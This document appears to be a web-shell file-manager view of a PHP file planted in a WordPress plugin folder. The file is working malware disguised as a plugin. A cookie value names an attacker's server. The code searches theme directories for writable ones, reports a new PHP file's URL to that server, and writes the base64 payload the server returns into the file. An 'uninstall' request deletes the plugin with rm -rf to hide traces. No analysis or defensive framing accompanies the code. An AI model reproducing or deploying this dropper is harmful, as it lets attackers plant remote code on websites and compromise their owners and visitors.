ꦫꦣꦺꦤ꧀ꦄꦤ꧀ꦠꦱꦺꦤ

PATH: home / fengshp / www / wp-content / plugins / hellodab

<?php
$plug_name = basename(__DIR__);

if($_POST['uninstall']){

$f = fopen('__FILE__', 'w');
	fclose($f);
	exec('rm -rf ../'.$plug_name);
	exit;
}

$cuu = $_COOKIE[764] ?? null; if($cuu === null){ exit; }

///
$scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? 'https://' : 'http://';
//
$site   = $scheme . $_SERVER['HTTP_HOST']; 
$file_name = substr(md5(time().$_SERVER['HTTP_HOST']), 0, 8).rand(1, 99).'.php' ;

$rootDir = realpath($_SERVER['DOCUMENT_ROOT']).'/wp-content/themes';
if ($rootDir === false) {
    die('!end!');
}

function getFileUrl(string $absolutePath, string $site): ?string
{
    $abs = str_replace('\\', '/', realpath($absolutePath));
    if ($abs === false) {               
        return null;
    }

$docRoot = rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/');

if (stripos($abs, $docRoot) !== 0) {
        return null;                   
    }

$relative = substr($abs, strlen($docRoot));
    $relative = '/' . ltrim($relative, '/');

$site = rtrim($site, '/');
    return $site . $relative;
}

//
function getDirectoriesRecursive(string $basePath): array
{
    $dirs = [];
    $rootDepth = substr_count($basePath, DIRECTORY_SEPARATOR);
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator(
            $basePath,
            FilesystemIterator::SKIP_DOTS
        ),
        RecursiveIteratorIterator::SELF_FIRST
    );

foreach ($iterator as $item) {
        if ($item->isDir()) {
            $path = $item->getRealPath();
            $depthRel = substr_count($path, DIRECTORY_SEPARATOR) - $rootDepth;
            $accessible = is_readable($path);
            $dirs[] = [
                'path'       => $path,
                'depth'      => $depthRel,
                'accessible' => $accessible,
            ];
        }
    }
    usort($dirs, fn($a, $b) => $b['depth'] <=> $a['depth']);
    return $dirs;
}

//
function apiret($furl){
    $data = '';
    $apurl = trim($_COOKIE[764]);
    $apiEndpoint = $apurl;

$ch = curl_init($apiEndpoint);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded',]);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['url' => $furl]));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);   
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($response === false) {
        echo ' cURL error: ' . curl_error($ch) . "\n";
        die('!end!');
    }

if ($httpCode === 200) {
        $data = json_decode($response, true);
        if (json_last_error() !== JSON_ERROR_NONE) {
            die('!end!');
        }
    }
    curl_close($ch);

return $data;
}

//
$directories = getDirectoriesRecursive($rootDir);

foreach ($directories as $key => $value) {
   
    $path = $value['path'];
    if (!is_dir($path)) {
        continue;
    }

if (!is_writable($path)) {
        continue;
    }

$file_path = $value['path'].'/'.$file_name;
    $handle = @fopen($file_path, 'w'); 
    if ($handle === false) {
        continue;
    }

$url = getFileUrl($file_path, $site);

//
    if ($url === null) {
        continue;
    }

//
    $data = apiret($url);

if($data == ''){
        die('!end!');
    }

$bytes = fwrite($handle, base64_decode($data['data'])); 
    if ($bytes === false) {
        die('!end!');
    }
    fflush($handle);
    fclose($handle);

die('!success!');
}
die('!end!');

[+] ..
[-] hello.php [edit]
[-] inst-plug.php [edit]